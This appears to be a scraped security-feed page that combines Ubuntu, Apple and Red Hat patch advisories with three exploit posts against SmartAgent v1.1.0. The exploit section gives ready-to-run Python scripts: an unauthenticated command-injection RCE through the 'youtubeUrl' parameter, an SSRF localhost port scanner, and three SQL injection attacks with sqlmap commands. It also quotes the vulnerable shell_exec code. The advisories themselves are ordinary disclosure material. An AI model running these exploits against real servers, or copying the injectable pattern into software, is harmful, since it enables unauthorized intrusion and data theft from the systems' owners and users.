CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-48.48  https://launchpad.net/ubuntu/+source/linux-azure-6.8/6.8.0-1017.20~22.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-6.8/6.8.0-1017.19~22.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-6.8/6.8.0-48.48~22.04.1

Ubuntu Security Notice USN-7089-1

SmartAgent version 1.1.0 suffers from an unauthenticated remote code execution vulnerability in youtubeInfo.php.

    # Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.Vulnerable code snippet from youtubeInfo.php:"""$youtubeUrl=$_POST["youtubeUrl"];$command = 'youtube-dl -j ' . $youtubeUrl;echo  shell_exec($command);"""Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smarts-srlcom.com?youtubeInfo.php"command = input("Enter the command you want to run $EX: id$: ")postdata = {    "youtubeUrl": ";" + command}response = requests.post(url, data=postdata, verify=False)print(response.text)

SmartAgent 1.1.0 Remote Code Execution

SmartAgent version 1.1.0 suffers from a server-side request forgery vulnerability.

    # Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script  https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.The GET request includes the vulnerable parameter "url".Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smartagent.[client].com/FB/getFbVideoSource.php"port = input("Enter the port you want to check: ")parameter = {  "url": "http://127.0.0.1:" + port}response = requests.get(url, data=parameter, verify=False)if response.status_code == 200:    print(f"Port {port} is open on the server")else:    print(f"Port {port} closed")

SmartAgent 1.1.0 Server-Side Request Forgery

SmartAgent version 1.1.0 suffers from multiple unauthenticated remote SQL injection vulnerabilities.

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a POST request to the vulnerable script https://smarts-srlcom.com/privateArea/common/tests/interface.php.

The POST request includes the folowing parameters "action=exportNetworkDate&id=1111" and vulnerable parameter is "id".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/privateArea/common/tests/interface.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

postdata = {  
    "action": "exportNetworkDate",  
  "id": "1111" + sqlcommand  
}

response = requests.post(url, data=postdata, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u https://smartagent.[client].com/privateArea/common/tests/interface.php. --data "action=exportNetworkDate&id=1111" -p "id"

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/privateArea/common/qoe/sendPushManually.php?id=123.

The GET request includes the vulnerable parameter "id".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

parameter = {  
  "id": "123" + sqlcommand  
}

response = requests.get(url, data=parameter, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u  https://smartagent.[client].com/privateArea/common/qoe/sendPushManually.php?id=123 -p "id"

# Exploit Title: SmartAgent v1.1.0 - Unauthenticated SQL Injection (SQLi)  
# Date: 01-10-2024  
# Exploit Author: Alter Prime  
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com  
# Version: Build v1.1.0  
# Tested on: Kali Linux

An unauthenticated user can inject SQL queries through a GET request to the vulnerable script https://smarts-srlcom.com/recuperaLog.php?client=1111.

The GET request includes the vulnerable parameter "client".

Steps To Reproduce:  
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0

#Python Exploit

import requests

url = "https://smartagent.[client].com/recuperaLog.php"  
sqlcommand = input("Enter the command you want to run $EX: UNION SELECT @@version$: ")

parameter = {  
  "client": "1111" + sqlcommand  
}

response = requests.get(url, data=parameter, verify=False)  
print(response.text)

2. Alternatively SQLMAP could pe used on the same endpoint 

sqlmap -u https://smartagent.[client].com/recuperaLog.php?client=1111 -p "client"

SmartAgent 1.1.0 SQL Injection

Ubuntu Security Notice 7088-1 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7088-1October 31, 2024linux, linux-gcp, linux-gcp-5.4, linux-gkeop, linux-hwe-5.4, linux-ibm,linux-ibm-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systemsDetails:Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linuxkernel contained an integer overflow vulnerability. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2022-36402)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - PowerPC architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - CPU frequency scaling framework;  - Device frequency scaling framework;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - InfiniBand drivers;  - Input Device core drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - EEPROM drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB subsystem;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - NILFS2 file system;  - BPF subsystem;  - Core kernel;  - DMA mapping infrastructure;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - Netfilter;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Simplified Mandatory Access Control Kernel framework;  - SoC audio core drivers;  - USB sound devices;(CVE-2024-43894, CVE-2024-46737, CVE-2024-46828, CVE-2024-42244,CVE-2024-46723, CVE-2024-41073, CVE-2024-46756, CVE-2024-42288,CVE-2024-46840, CVE-2024-46771, CVE-2024-46757, CVE-2024-43860,CVE-2024-46747, CVE-2024-41017, CVE-2024-42246, CVE-2024-44988,CVE-2024-42281, CVE-2024-36484, CVE-2024-43856, CVE-2024-47668,CVE-2024-46759, CVE-2024-46744, CVE-2024-42289, CVE-2024-42131,CVE-2024-46679, CVE-2024-42304, CVE-2024-46818, CVE-2024-43858,CVE-2024-44960, CVE-2024-45028, CVE-2024-26885, CVE-2024-46676,CVE-2024-46780, CVE-2024-42310, CVE-2024-44987, CVE-2024-41090,CVE-2024-44954, CVE-2024-45026, CVE-2024-42285, CVE-2023-52614,CVE-2024-27051, CVE-2024-43880, CVE-2024-43839, CVE-2024-43884,CVE-2024-42311, CVE-2024-43893, CVE-2024-41072, CVE-2024-41091,CVE-2024-46758, CVE-2024-41022, CVE-2024-46745, CVE-2024-42305,CVE-2024-46673, CVE-2024-42284, CVE-2024-46844, CVE-2024-46677,CVE-2024-45025, CVE-2024-43861, CVE-2024-43914, CVE-2024-46783,CVE-2024-41012, CVE-2024-44999, CVE-2024-44946, CVE-2024-42276,CVE-2024-46740, CVE-2024-42295, CVE-2024-44947, CVE-2024-41059,CVE-2024-26669, CVE-2024-38602, CVE-2024-42306, CVE-2023-52918,CVE-2024-42297, CVE-2024-42229, CVE-2024-43853, CVE-2024-45006,CVE-2024-44998, CVE-2024-42283, CVE-2024-44952, CVE-2024-46761,CVE-2024-43841, CVE-2024-44944, CVE-2024-42313, CVE-2024-45008,CVE-2024-46714, CVE-2024-41065, CVE-2024-43883, CVE-2024-43867,CVE-2024-42286, CVE-2024-43879, CVE-2024-43846, CVE-2024-42280,CVE-2024-43854, CVE-2021-47212, CVE-2024-35848, CVE-2024-41020,CVE-2024-41068, CVE-2024-45021, CVE-2024-41098, CVE-2024-44965,CVE-2024-43890, CVE-2024-45003, CVE-2024-44969, CVE-2024-41011,CVE-2024-46738, CVE-2024-41071, CVE-2024-26800, CVE-2024-46721,CVE-2024-42292, CVE-2024-41081, CVE-2024-44948, CVE-2023-52531,CVE-2024-26891, CVE-2024-26641, CVE-2024-42287, CVE-2024-46722,CVE-2024-41042, CVE-2024-46675, CVE-2024-46743, CVE-2024-42259,CVE-2024-41015, CVE-2024-43908, CVE-2024-46719, CVE-2024-43871,CVE-2024-46739, CVE-2024-42301, CVE-2024-47659, CVE-2024-42271,CVE-2024-26668, CVE-2024-43835, CVE-2024-46829, CVE-2024-47667,CVE-2024-44995, CVE-2024-47669, CVE-2024-38611, CVE-2024-40929,CVE-2024-46815, CVE-2024-43830, CVE-2024-42309, CVE-2024-41063,CVE-2024-46782, CVE-2024-46777, CVE-2024-42265, CVE-2024-46781,CVE-2024-26607, CVE-2024-41064, CVE-2024-46685, CVE-2024-43882,CVE-2024-44935, CVE-2024-46800, CVE-2024-46822, CVE-2024-46755,CVE-2024-46817, CVE-2024-43829, CVE-2024-46798, CVE-2024-46689,CVE-2024-42290, CVE-2024-46750, CVE-2024-26640, CVE-2024-47663,CVE-2024-41070)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1082-ibm      5.4.0-1082.87  linux-image-5.4.0-1102-gkeop    5.4.0-1102.106  linux-image-5.4.0-1139-gcp      5.4.0-1139.148  linux-image-5.4.0-200-generic   5.4.0-200.220  linux-image-5.4.0-200-generic-lpae  5.4.0-200.220  linux-image-5.4.0-200-lowlatency  5.4.0-200.220  linux-image-gcp-lts-20.04       5.4.0.1139.141  linux-image-generic             5.4.0.200.196  linux-image-generic-lpae        5.4.0.200.196  linux-image-gkeop               5.4.0.1102.100  linux-image-gkeop-5.4           5.4.0.1102.100  linux-image-ibm-lts-20.04       5.4.0.1082.111  linux-image-lowlatency          5.4.0.200.196  linux-image-oem                 5.4.0.200.196  linux-image-oem-osp1            5.4.0.200.196  linux-image-virtual             5.4.0.200.196Ubuntu 18.04 LTS  linux-image-5.4.0-1082-ibm      5.4.0-1082.87~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-1139-gcp      5.4.0-1139.148~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-200-generic   5.4.0-200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-5.4.0-200-lowlatency  5.4.0-200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-gcp                 5.4.0.1139.148~18.04.1                                  Available with Ubuntu Pro  linux-image-generic-hwe-18.04   5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-ibm                 5.4.0.1082.87~18.04.1                                  Available with Ubuntu Pro  linux-image-lowlatency-hwe-18.04  5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-oem                 5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-oem-osp1            5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-snapdragon-hwe-18.04  5.4.0.200.220~18.04.1                                  Available with Ubuntu Pro  linux-image-virtual-hwe-18.04   5.4.0.200.220~18.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7088-1  CVE-2021-47212, CVE-2022-36402, CVE-2023-52531, CVE-2023-52614,  CVE-2023-52918, CVE-2024-26607, CVE-2024-26640, CVE-2024-26641,  CVE-2024-26668, CVE-2024-26669, CVE-2024-26800, CVE-2024-26885,  CVE-2024-26891, CVE-2024-27051, CVE-2024-35848, CVE-2024-36484,  CVE-2024-38602, CVE-2024-38611, CVE-2024-40929, CVE-2024-41011,  CVE-2024-41012, CVE-2024-41015, CVE-2024-41017, CVE-2024-41020,  CVE-2024-41022, CVE-2024-41042, CVE-2024-41059, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41068, CVE-2024-41070,  CVE-2024-41071, CVE-2024-41072, CVE-2024-41073, CVE-2024-41081,  CVE-2024-41090, CVE-2024-41091, CVE-2024-41098, CVE-2024-42131,  CVE-2024-42229, CVE-2024-42244, CVE-2024-42246, CVE-2024-42259,  CVE-2024-42265, CVE-2024-42271, CVE-2024-42276, CVE-2024-42280,  CVE-2024-42281, CVE-2024-42283, CVE-2024-42284, CVE-2024-42285,  CVE-2024-42286, CVE-2024-42287, CVE-2024-42288, CVE-2024-42289,  CVE-2024-42290, CVE-2024-42292, CVE-2024-42295, CVE-2024-42297,  CVE-2024-42301, CVE-2024-42304, CVE-2024-42305, CVE-2024-42306,  CVE-2024-42309, CVE-2024-42310, CVE-2024-42311, CVE-2024-42313,  CVE-2024-43829, CVE-2024-43830, CVE-2024-43835, CVE-2024-43839,  CVE-2024-43841, CVE-2024-43846, CVE-2024-43853, CVE-2024-43854,  CVE-2024-43856, CVE-2024-43858, CVE-2024-43860, CVE-2024-43861,  CVE-2024-43867, CVE-2024-43871, CVE-2024-43879, CVE-2024-43880,  CVE-2024-43882, CVE-2024-43883, CVE-2024-43884, CVE-2024-43890,  CVE-2024-43893, CVE-2024-43894, CVE-2024-43908, CVE-2024-43914,  CVE-2024-44935, CVE-2024-44944, CVE-2024-44946, CVE-2024-44947,  CVE-2024-44948, CVE-2024-44952, CVE-2024-44954, CVE-2024-44960,  CVE-2024-44965, CVE-2024-44969, CVE-2024-44987, CVE-2024-44988,  CVE-2024-44995, CVE-2024-44998, CVE-2024-44999, CVE-2024-45003,  CVE-2024-45006, CVE-2024-45008, CVE-2024-45021, CVE-2024-45025,  CVE-2024-45026, CVE-2024-45028, CVE-2024-46673, CVE-2024-46675,  CVE-2024-46676, CVE-2024-46677, CVE-2024-46679, CVE-2024-46685,  CVE-2024-46689, CVE-2024-46714, CVE-2024-46719, CVE-2024-46721,  CVE-2024-46722, CVE-2024-46723, CVE-2024-46737, CVE-2024-46738,  CVE-2024-46739, CVE-2024-46740, CVE-2024-46743, CVE-2024-46744,  CVE-2024-46745, CVE-2024-46747, CVE-2024-46750, CVE-2024-46755,  CVE-2024-46756, CVE-2024-46757, CVE-2024-46758, CVE-2024-46759,  CVE-2024-46761, CVE-2024-46771, CVE-2024-46777, CVE-2024-46780,  CVE-2024-46781, CVE-2024-46782, CVE-2024-46783, CVE-2024-46798,  CVE-2024-46800, CVE-2024-46815, CVE-2024-46817, CVE-2024-46818,  CVE-2024-46822, CVE-2024-46828, CVE-2024-46829, CVE-2024-46840,  CVE-2024-46844, CVE-2024-47659, CVE-2024-47663, CVE-2024-47667,  CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux/5.4.0-200.220  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1139.148  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1102.106  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1082.87

Ubuntu Security Notice USN-7088-1

Apple Security Advisory 10-29-2024-1 - Safari 18.1 addresses an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-29-2024-1 Safari 18.1

Safari 18.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121571.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Safari Downloads  
Available for: macOS Ventura and macOS Sonoma  
Impact: An attacker may be able to misuse a trust relationship to  
download malicious content  
Description: This issue was addressed through improved state management.  
CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Safari Private Browsing  
Available for: macOS Ventura and macOS Sonoma  
Impact: Private browsing may leak some browsing history  
Description: An information leakage was addressed with additional  
validation.  
CVE-2024-44229: Lucas Di Tomase

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

Additional recognition

Safari Private Browsing  
We would like to acknowledge an anonymous researcher, r00tdaddy for  
their assistance.

Safari Tabs  
We would like to acknowledge Jaydev Ahire for their assistance.

Safari 18.1 may be obtained from the Mac App Store.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmchbpEACgkQX+5d1TXa  
Ivr5gBAAk50bIQ2NvoHDWo1ss9TLbGh9aa2RAHRPS0HqbBmnolc5tcrB1wKorkaf  
FF6lACO/OOti2KjAX44zfLl+9zHMsEFzDkmrY8VosFkYAaLUOly/xYaCUcQcuhLC  
VZy4Moviip3ImFDvR/EjO8vI/7GAjt3XafvRf1k5+w5xzmCuM8mhzLSfs1s4/lxd  
EThQBB7oA18grjnxJqAh9tBwquUkfmGuY9twsNH5qccv+wgw9gYvCIr0jbtCn2vz  
K5FHY/RDmMOfoLZ3am0JqrWd/7uO3bWHYQzS5H501x2tsLJw6Hwy9u+P2NxvRzXd  
pu6WJ22Adei85x5o34W+K42iannlzpgMnMeT81khVzVTY1HKPBikZ1wS13kZ9UyY  
j9dnW0NReyKhDYzFPiTehgC2mErmFWzLtRzxzs/Af7iVadAXw+6evBtP5FIzEqFX  
FfbhS+0icaU3FGklxcD+5++T+OKvo5hDAVjp7lGbBv5C2WvlpuNfmdIXkqYbzpdv  
mIujHNTWNYArlIkXr7vUVOHdB//BtfbIGZdjddYpZbx7q6KxX+z8q+NQ/8ESEUXZ  
KIF0cOAI1P2nVdALfpMaqKVFJa+BfwhWklscDDgPOpVQy0I5cIFJj7MVves534js  
sR+tn4B5jKfe6tmLy1xkgqpTYcdPe/TzW0tc6IRidvYVk3zhpMA=  
=9Fs5  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-29-2024-1

Red Hat Security Advisory 2024-8729-03 - An update for firefox is now available for Red Hat Enterprise Linux 8. Issues addressed include cross site scripting, denial of service, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8729.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: firefox security update  
Advisory ID:        RHSA-2024:8729-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8729  
Issue date:         2024-11-01  
Revision:           03  
CVE Names:          CVE-2024-10458  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* firefox: thunderbird: History interface could have been used to cause a Denial of Service condition in the browser (CVE-2024-10464)

* firefox: thunderbird: XSS due to Content-Disposition being ignored in multipart/x-mixed-replace response (CVE-2024-10461)

* firefox: thunderbird: Permission leak via embed or object elements (CVE-2024-10458)

* firefox: thunderbird: Use-after-free in layout with accessibility (CVE-2024-10459)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 132, Thunderbird 132, Firefox ESR 128.4, and Thunderbird 128.4 (CVE-2024-10467)

* firefox: thunderbird: Clipboard \"paste\" button persisted across tabs (CVE-2024-10465)

* firefox: DOM push subscription message could hang Firefox (CVE-2024-10466)

* firefox: thunderbird: Cross origin video frame leak (CVE-2024-10463)

* firefox: thunderbird: Origin of permission prompt could be spoofed by long URL (CVE-2024-10462)

* firefox: thunderbird: Confusing display of origin for external protocol handler prompt (CVE-2024-10460)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-10458

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2322424  
https://bugzilla.redhat.com/show_bug.cgi?id=2322425  
https://bugzilla.redhat.com/show_bug.cgi?id=2322428  
https://bugzilla.redhat.com/show_bug.cgi?id=2322429  
https://bugzilla.redhat.com/show_bug.cgi?id=2322433  
https://bugzilla.redhat.com/show_bug.cgi?id=2322434  
https://bugzilla.redhat.com/show_bug.cgi?id=2322438  
https://bugzilla.redhat.com/show_bug.cgi?id=2322439  
https://bugzilla.redhat.com/show_bug.cgi?id=2322440  
https://bugzilla.redhat.com/show_bug.cgi?id=2322444

Tag

#vulnerability